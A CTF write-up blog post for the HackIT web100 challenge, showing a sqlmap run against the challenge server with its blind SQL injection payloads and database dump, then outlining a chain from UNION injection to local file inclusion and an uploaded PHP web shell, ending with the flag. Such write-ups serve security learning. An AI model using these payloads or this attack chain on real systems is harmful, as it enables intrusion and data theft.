HackIT CTF web100 V1rus3pidem1c Write up
HackIT CTF web100 V1rus3pidem1c Write up
ch4n3 [at] BoB 6th, team Demon & H3X0R
very fun CTF!
i want to solve more.. hh
this challenge can be solved SQLi + LFI.
I love this kind of challenges.
http://tasks.ctf.com.ua:13372/index.php?country=Germany
This index.php has SQL Injection vuln. So, you can extract the DB.
I was very tiresome, I used SQL Map.
ch4n3@Ubuntu:~$ sqlmap -u "tasks.ctf.com.ua:13372/index.php?country=UK" --threads=8 --dbs -D WHATAREYOUDOINGHERE --dump
_
___ ___| |_____ ___ ___ {1.0.4.0#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:15:26
[15:15:26] [INFO] resuming back-end DBMS 'mysql'
[15:15:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: country (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: country=UK' AND 6029=6029 AND 'gNZg'='gNZg
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: country=UK' AND (SELECT * FROM (SELECT(SLEEP(5)))Yika) AND 'thyo'='thyo
---
[15:15:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[15:15:27] [INFO] fetching database names
[15:15:27] [INFO] fetching number of databases
[15:15:27] [INFO] resumed: 2
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 18
[15:15:27] [INFO] resumed: information_schema
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 19
[15:15:27] [INFO] resumed: WHATAREYOUDOINGHERE
available databases [2]:
[*] information_schema
[*] WHATAREYOUDOINGHERE
[15:15:27] [INFO] fetching tables for database: 'WHATAREYOUDOINGHERE'
[15:15:27] [INFO] fetching number of tables for database 'WHATAREYOUDOINGHERE'
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 9
[15:15:27] [INFO] resumed: countries
[15:15:27] [INFO] fetching columns for table 'countries' in database 'WHATAREYOUDOINGHERE'
[15:15:27] [INFO] resumed: 3
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 9
[15:15:27] [INFO] resumed: countryID
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 11
[15:15:27] [INFO] resumed: countryName
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 10
[15:15:27] [INFO] resumed: scriptPath
[15:15:27] [INFO] fetching entries for table 'countries' in database 'WHATAREYOUDOINGHERE'
[15:15:27] [INFO] fetching number of entries for table 'countries' in database 'WHATAREYOUDOINGHERE'
[15:15:27] [INFO] resumed: 10
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 7
[15:15:27] [INFO] resumed: Germany
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/ge.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 2
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 12
[15:15:27] [INFO] resumed: Turkmenistan
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/tu.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 3
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 11
[15:15:27] [INFO] resumed: Netherlands
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/ne.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 4
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] resumed: Serbia
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/se.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 5
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] resumed: Turkey
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/tk.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] resumed: France
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/fr.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 7
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 2
[15:15:27] [INFO] resumed: UK
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/uk.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 8
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] resumed: Russia
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/ru.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 1
[15:15:27] [INFO] resumed: 9
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 3
[15:15:27] [INFO] resumed: USA
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/us.php
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 2
[15:15:27] [INFO] resumed: 10
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 6
[15:15:27] [INFO] resumed: Canada
[15:15:27] [INFO] retrieving the length of query output
[15:15:27] [INFO] resumed: 14
[15:15:27] [INFO] resumed: country/ca.php
[15:15:27] [INFO] analyzing table dump for possible password hashes
Database: WHATAREYOUDOINGHERE
Table: countries
[10 entries]
+-----------+----------------+--------------+
| countryID | scriptPath | countryName |
+-----------+----------------+--------------+
| 1 | country/ge.php | Germany |
| 2 | country/tu.php | Turkmenistan |
| 3 | country/ne.php | Netherlands |
| 4 | country/se.php | Serbia |
| 5 | country/tk.php | Turkey |
| 6 | country/fr.php | France |
| 7 | country/uk.php | UK |
| 8 | country/ru.php | Russia |
| 9 | country/us.php | USA |
| 10 | country/ca.php | Canada |
+-----------+----------------+--------------+
[15:15:27] [INFO] table 'WHATAREYOUDOINGHERE.countries' dumped to CSV file '/home/ch4n3/.sqlmap/output/tasks.ctf.com.ua/dump/WHATAREYOUDOINGHERE/countries.csv'
[15:15:27] [INFO] fetched data logged to text files under '/home/ch4n3/.sqlmap/output/tasks.ctf.com.ua'
ch4n3@Ubuntu:~$
Seeing scriptPath, you can know the function "include" is using.
Then,,, if we attack the SQL, we can change the scriptPath by 'union'.
It'll have the LFI vuln so.
9reat. We got the source code of it.
You can get the path of your uploaded file.
We can execute our web shell.
I uploaded my webshell.
And I checked the file exists.
http://tasks.ctf.com.ua:13372/uploads/php_shell.txt
Include it.
You can execute your web shell.
Get flag.
The flag is h4ck1t{$QL&LFI=FR13ND$}
'write-ups > CTF' 카테고리의 다른 글
| 화이트햇 콘테스트 familiar write-up (0) | 2017.11.07 |
|---|---|
| Kiwi CTF write up (0) | 2017.10.16 |
| defcamp CTF write up (0) | 2017.10.03 |
| 화이트햇리그 HUST write up (0) | 2017.08.17 |
| 2017 DIMI-CTF write up (0) | 2017.07.17 |